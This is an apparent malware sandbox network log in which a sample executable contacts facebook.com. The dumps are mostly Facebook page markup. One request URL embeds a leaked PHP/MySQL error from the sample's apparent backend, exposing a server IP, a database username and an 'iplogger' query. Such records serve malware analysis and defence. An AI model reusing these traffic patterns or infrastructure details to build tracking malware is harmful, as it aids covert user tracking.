2022-10-07 13:58:46 UTC	290	IN	Data Raw: 59 7a 6c 73 4f 51 6e 44 36 55 39 4c 44 67 51 5f 39 43 6d 58 4f 4e 78 4a 30 34 6a 6b 33 73 64 50 72 39 39 66 32 49 35 72 53 46 34 51 38 67 78 33 4a 77 53 44 4e 58 6b 55 32 34 35 39 59 4a 71 5a 34 76 53 4b 62 71 51 35 74 72 61 45 77 6d 6e 49 38 68 48 55 51 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 53 61 66 61 72 69 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c Data Ascii: YzlsOQnD6U9LDgQ_9CmXONxJ04jk3sdPr99f2I5rSF4Q8gx3JwSDNXkU2459YJqZ4vSKbqQ5traEwmnI8hHUQ\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">Safari\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\
2022-10-07 13:58:46 UTC	291	IN	Data Raw: 6f 6f 6b 69 65 62 61 6e 6e 65 72 3d 5c 22 61 63 63 65 70 74 5f 62 75 74 74 6f 6e 5c 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 5c 22 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 6d 61 6e 61 67 65 2d 64 69 61 6c 6f 67 2d 61 63 63 65 70 74 2d 62 75 74 74 6f 6e 5c 22 20 74 69 74 6c 65 3d 5c 22 41 6c 6c 6f 77 20 65 73 73 65 6e 74 69 61 6c 20 61 6e 64 20 6f 70 74 69 6f 6e 61 6c 20 63 6f 6f 6b 69 65 73 5c 22 20 74 79 70 65 3d 5c 22 73 75 62 6d 69 74 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 64 5f 63 33 5c 22 3e 41 6c 6c 6f 77 20 65 73 73 65 6e 74 69 61 6c 20 61 6e 64 20 6f 70 74 69 6f 6e 61 6c 20 63 6f 6f 6b 69 65 73 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 22 Data Ascii: ookiebanner=\"accept_button\" data-testid=\"cookie-policy-manage-dialog-accept-button\" title=\"Allow essential and optional cookies\" type=\"submit\" id=\"u_0_d_c3\">Allow essential and optional cookies\u003C\/button>\u003C\/div>\u003C\/div>\u003C\/div>"
2022-10-07 13:58:46 UTC	293	IN	Data Raw: 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6c 5f 46 7a 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 33 39 35 5c 75 30 33 62 62 5c 75 30 33 62 62 5c 75 30 33 62 37 5c 75 30 33 62 64 5c 75 30 33 62 39 5c 75 30 33 62 61 5c 75 30 33 61 63 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6d 5f 4a 46 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 34 32 30 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 61 5c 75 30 34 33 38 5c 75 30 34 33 39 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6e 5f 58 6f 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 35 65 32 5c 75 30 35 64 31 5c 75 30 35 65 38 5c 75 30 35 64 39 5c 75 30 35 65 61 22 7d 2c 31 5d 2c 5b 22 5f 5f Data Ascii: markup_3310c079_0_l_Fz",{"__html":"\u0395\u03bb\u03bb\u03b7\u03bd\u03b9\u03ba\u03ac"},1],["__markup_3310c079_0_m_JF",{"__html":"\u0420\u0443\u0441\u0441\u043a\u0438\u0439"},1],["__markup_3310c079_0_n_Xo",{"__html":"\u05e2\u05d1\u05e8\u05d9\u05ea"},1],["__
2022-10-07 13:58:46 UTC	294	IN	Data Raw: 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 4d 4a 22 2c 22 75 5f 30 5f 39 5f 6c 63 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 50 5a 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 35 5f 37 6e 22 2c 22 75 5f 30 5f 61 5f 4e 4c 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 50 5a 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 36 5f 55 36 22 2c 22 75 5f 30 5f 62 5f 6b 51 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 50 5a 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 31 5f 44 58 22 2c 22 75 5f 30 5f 63 5f 4d 48 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 Data Ascii: __elem_a588f507_0_4_MJ","u_0_9_lc",1,"__markup_9f5fac15_0_0_PZ"],["__elem_a588f507_0_5_7n","u_0_a_NL",1,"__markup_9f5fac15_0_0_PZ"],["__elem_a588f507_0_6_U6","u_0_b_kQ",1,"__markup_9f5fac15_0_0_PZ"],["__elem_45d73b5d_0_1_DX","u_0_c_MH",1,"__markup_9f5fac1
2022-10-07 13:58:46 UTC	296	IN	Data Raw: 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 5c 75 30 30 32 35 32 30 65 78 70 65 63 74 73 5c 75 30 30 32 35 32 30 70 61 72 61 6d 65 74 65 72 5c 75 30 30 32 35 32 30 32 5c 75 30 30 32 35 32 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 65 2c 5c 75 30 30 32 35 32 30 62 6f 6f 6c 65 61 6e 5c 75 30 30 32 35 32 30 67 69 76 65 6e 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 Data Ascii: \u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_query()\u002520expects\u002520parameter\u0025202\u002520to\u002520be\u002520resource,\u002520boolean\u002520given\u002520in\u002520\u00253Cb\u002
2022-10-07 13:58:46 UTC	297	IN	Data Raw: 5b 22 46 42 4c 79 6e 78 22 2c 22 73 65 74 75 70 44 65 6c 65 67 61 74 69 6f 6e 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 4c 6f 67 69 6e 62 61 72 50 6f 70 6f 76 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 39 34 63 31 35 33 38 35 5f 30 5f 30 5f 6c 4e 22 2c 22 5f 5f 65 6c 65 6d 5f 30 37 32 62 38 65 36 34 5f 30 5f 30 5f 52 46 22 2c 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 73 41 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 39 34 63 31 35 33 38 35 5f 30 5f 30 5f 6c 4e 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 30 37 32 62 38 65 36 34 5f 30 5f 30 5f 52 46 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 73 41 22 7d 5d 5d 2c 5b 22 54 69 6d 65 7a 6f 6e 65 41 75 74 6f 73 Data Ascii: ["FBLynx","setupDelegation",[],[]],["LoginbarPopover","init",["__elem_94c15385_0_0_lN","__elem_072b8e64_0_0_RF","__elem_a588f507_0_3_sA"],[{"__m":"__elem_94c15385_0_0_lN"},{"__m":"__elem_072b8e64_0_0_RF"},{"__m":"__elem_a588f507_0_3_sA"}]],["TimezoneAutos
2022-10-07 13:58:46 UTC	299	IN	Data Raw: 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 73 64 22 5d 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65 66 65 72 65 6e 63 65 22 2c 22 75 6e 62 6c 6f 63 6b 22 2c 5b 5d 2c 5b 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 63 73 73 22 5d 5d 2c 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 5d 2c Data Ascii: ging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","PageTransitions","Animation"],"sd"]],["RequireDeferredReference","unblock",[],[["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","PageTransitions","Animation"],"css"]],["TimeSliceImpl"],
2022-10-07 13:58:46 UTC	300	IN	Data Raw: 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 57 30 4f 78 34 53 66 62 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 5f 2f 72 2f 4b 49 34 53 30 6d 73 38 51 35 64 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 57 30 4f 78 34 53 66 62 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 69 2f 72 2f 69 69 44 Data Ascii: j3Wp8lg5Kz" as="script" nonce="W0Ox4Sfb" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/r/KI4S0ms8Q5d.js?_nc_x=Ij3Wp8lg5Kz" as="script" nonce="W0Ox4Sfb" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/iiD
2022-10-07 13:58:46 UTC	301	IN	Data Raw: 65 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 5f 5f 62 69 67 50 69 70 65 43 74 6f 72 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 42 69 67 50 69 70 65 29 7b 64 65 66 69 6e 65 28 22 5f 5f 62 69 67 50 69 70 65 22 2c 5b 5d 2c 77 69 6e 64 6f 77 2e 62 69 67 50 69 70 65 3d 6e 65 77 20 42 69 67 50 69 70 65 28 7b 22 66 6f 72 63 65 46 69 6e 69 73 68 22 3a 74 72 75 65 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 66 6c 75 73 68 5f 70 61 67 65 6c 65 74 73 5f 61 73 61 70 22 3a 74 72 75 65 2c 22 64 69 73 70 61 74 63 68 5f 70 61 67 65 6c 65 74 5f 72 65 70 6c 61 79 61 62 6c 65 5f 61 63 74 69 6f 6e 73 22 3a 66 61 6c 73 65 7d 7d 29 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c Data Ascii: e" /><script>window.__bigPipeCtor=now_inl();requireLazy(["BigPipe"],function(BigPipe){define("__bigPipe",[],window.bigPipe=new BigPipe({"forceFinish":true,"config":{"flush_pagelets_asap":true,"dispatch_pagelet_replayable_actions":false}}));});</script><
2022-10-07 13:58:46 UTC	303	IN	Data Raw: 6e 6f 6e 63 65 3d 22 57 30 4f 78 34 53 66 62 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 7b 64 69 73 70 6c 61 79 52 65 73 6f 75 72 63 65 73 3a 5b 22 68 4b 59 30 51 4b 54 22 5d 2c 69 64 3a 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 70 68 61 73 65 3a 36 33 2c 6c 61 73 74 5f 69 6e 5f 70 68 61 73 65 3a 74 72 75 65 2c 74 68 65 5f 65 6e 64 3a 74 72 75 65 2c 6a 73 6d 6f 64 73 3a 7b 64 65 66 69 6e 65 3a 5b 5b 22 54 69 6d 65 53 6c 69 63 65 49 6e 74 65 72 61 63 74 69 6f 6e 53 56 22 2c 5b 5d 2c 7b 6f 6e 5f 64 65 6d 61 6e 64 5f 72 65 66 65 72 65 6e 63 65 5f 63 6f 75 6e 74 69 6e 67 3a 74 72 75 65 Data Ascii: nonce="W0Ox4Sfb">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletArrive({displayResources:["hKY0QKT"],id:"last_response",phase:63,last_in_phase:true,the_end:true,jsmods:{define:[["TimeSliceInteractionSV",[],{on_demand_reference_counting:true
2022-10-07 13:58:46 UTC	304	IN	Data Raw: 67 73 76 41 39 49 72 37 56 68 5a 38 4b 41 52 4f 6c 74 48 59 56 36 41 75 7a 43 69 31 39 35 4e 76 75 71 30 4f 5f 2d 54 48 74 4a 33 57 6a 47 58 67 73 6b 4a 52 39 55 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 31 49 79 44 71 72 4f 61 69 72 66 5f 5f 77 65 74 2d 5a 5a 4e 43 55 51 4b 43 6d 73 59 49 70 6a 33 78 5a 4a 67 73 76 41 39 49 72 37 56 68 5a 38 4b 41 52 4f 6c 74 48 59 56 36 41 75 7a 43 69 31 39 35 4e 76 75 71 30 4f 5f 2d 54 48 74 4a 33 57 6a 47 58 67 73 6b 4a 52 39 55 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 31 37 34 33 39 22 2c 5b 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 Data Ascii: gsvA9Ir7VhZ8KAROltHYV6AuzCi195Nvuq0O_-THtJ3WjGXgskJR9U"]},-1],["cr:1083117",[],{__rc:[null,"Aa1IyDqrOairf__wet-ZZNCUQKCmsYIpj3xZJgsvA9Ir7VhZ8KAROltHYV6AuzCi195Nvuq0O_-THtJ3WjGXgskJR9U"]},-1],["cr:917439",["PageTransitionsBlue"],{__rc:["PageTransitionsBlue
2022-10-07 13:58:46 UTC	306	IN	Data Raw: 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65 76 65 6e 74 73 3a 74 72 75 65 2c 67 72 61 70 68 65 78 70 6c 6f 72 65 72 3a 74 72 75 65 2c 73 74 69 63 6b 65 72 5f 73 65 61 72 63 68 5f 72 61 6e 6b 69 6e 67 3a 74 72 75 65 7d 2c 6b 6e 6f 77 6e 5f 72 6f 75 74 65 73 3a 5b 22 61 72 74 69 6c 6c 65 72 79 5f 6a 61 76 61 73 63 72 69 70 74 5f 61 63 74 69 6f 6e 73 22 2c 22 61 72 74 69 6c 6c 65 72 79 5f 6a 61 76 61 73 63 72 69 70 74 5f 74 72 61 63 65 22 2c 22 61 72 74 69 6c 6c 65 72 79 5f 6c 6f 67 67 65 72 5f 64 61 74 61 22 2c 22 6c 6f 67 67 65 72 22 2c 22 66 61 6c 63 6f 22 2c 22 67 6b 32 5f 65 78 70 6f 73 75 72 65 22 2c 22 Data Ascii: ikes:true,mercury_send_error_logging:true,platform_oauth_client_events:true,graphexplorer:true,sticker_search_ranking:true},known_routes:["artillery_javascript_actions","artillery_javascript_trace","artillery_logger_data","logger","falco","gk2_exposure","
2022-10-07 13:58:46 UTC	307	IN	Data Raw: 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 34 34 34 38 37 22 2c 5b 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 2c 22 41 61 32 64 63 64 41 4b 48 4b 36 55 67 58 38 66 63 30 41 76 44 30 45 30 5a 78 74 4b 44 5f 4c 79 75 50 70 34 50 30 6a 53 76 37 4d 31 74 4c 34 34 75 77 77 52 6f 4f 78 53 35 39 61 6f 78 73 58 5f 2d 4e 64 5a 49 4d 37 69 6a 64 75 75 66 43 55 46 63 43 77 71 6a 6f 32 4e 58 42 4c 5a 62 5f 4b 6d 38 5a 74 66 6d 54 6f 5a 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 35 33 33 35 39 22 2c 5b 22 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 49 6d 70 6c 46 6f 72 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 49 Data Ascii: },-1],["cr:1344487",["ReactDOM-prod.classic"],{__rc:["ReactDOM-prod.classic","Aa2dcdAKHK6UgX8fc0AvD0E0ZxtKD_LyuPp4P0jSv7M1tL44uwwRoOxS59aoxsX_-NdZIM7ijduufCUFcCwqjo2NXBLZb_Km8ZtfmToZ"]},-1],["cr:1353359",["EventListenerImplForBlue"],{__rc:["EventListenerI
2022-10-07 13:58:46 UTC	309	IN	Data Raw: 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22 4e 61 76 69 67 61 74 69 6f 6e 4d 65 74 72 69 63 73 22 2c 22 73 65 74 50 61 67 65 22 2c 5b 5d 2c 5b 7b 70 61 67 65 3a 22 2f 34 6f 68 34 2e 70 68 70 22 2c 70 61 67 65 5f 74 79 70 65 3a 22 6e 6f 72 6d 61 6c 22 2c 70 61 67 65 5f 75 72 69 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 44 65 70 72 65 63 61 74 65 64 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e Data Ascii: eActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/4oh4.php",page_type:"normal",page_uri:"https://www.facebook.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension
2022-10-07 13:58:46 UTC	310	IN	Data Raw: 72 54 72 61 6e 73 70 6f 72 74 73 22 2c 22 61 74 74 61 63 68 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 43 6c 69 63 6b 52 65 66 4c 6f 67 67 65 72 22 5d 2c 5b 22 44 65 74 65 63 74 42 72 6f 6b 65 6e 50 72 6f 78 79 43 61 63 68 65 22 2c 22 72 75 6e 22 2c 5b 5d 2c 5b 30 2c 22 63 5f 75 73 65 72 22 5d 5d 2c 5b 22 4e 61 76 69 67 61 74 69 6f 6e 43 6c 69 63 6b 50 6f 69 6e 74 48 61 6e 64 6c 65 72 22 5d 2c 5b 22 57 65 62 44 65 76 69 63 65 50 65 72 66 49 6e 66 6f 4c 6f 67 67 69 6e 67 22 2c 22 64 6f 4c 6f 67 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 57 65 62 53 74 6f 72 61 67 65 4d 6f 6e 73 74 65 72 22 2c 22 73 63 68 65 64 75 6c 65 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 41 72 74 69 6c 6c 65 72 79 22 2c 22 64 69 73 61 62 6c 65 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 53 63 72 69 70 74 50 61 74 68 4c 6f Data Ascii: rTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLo

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49707	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
2022-10-07 13:59:00 UTC	311	OUT	GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: www.facebook.com
2022-10-07 13:59:00 UTC	313	IN	HTTP/1.1 404 Not Found Vary: Accept-Encoding report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: same-origin cross-origin-opener-policy: same-origin-allow-popups Pragma: no-cache Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Frame-Options: DENY Strict-Transport-Security: max-age=15552000; preload Content-Type: text/html; charset="utf-8" X-FB-Debug: Mw7on8NFFWQR+rhcf+jwFGkmMZwHzGdxWCD76eqXdPgBQEl3jljuOL+ztiLVSBAo1eRA3ug5BkC60cvNiEhWDQ== Date: Fri, 07 Oct 2022 13:59:00 GMT Transfer-Encoding: chunked Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Connection: close
2022-10-07 13:59:00 UTC	314	IN	Data Raw: 61 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 34 49 7a 43 49 53 32 35 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 Data Ascii: a51<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="default" id="meta_referrer" /><script nonce="4IzCIS25">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requir
2022-10-07 13:59:00 UTC	315	IN	Data Raw: 6f 6e 20 62 28 62 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 29 72 65 74 75 72 6e 3b 62 2e 49 5f 41 4d 5f 49 4e 43 4f 47 4e 49 54 4f 5f 41 4e 44 5f 49 5f 52 45 41 4c 4c 59 5f 4e 45 45 44 5f 57 45 42 53 51 4c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 28 61 2c 62 2c 63 2c 64 29 7d 3b 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 29 7d 7d 62 28 61 29 7d 29 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 49 7a 43 49 53 32 35 22 3e 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 Data Ascii: on b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="4IzCIS25"></style><script nonce="
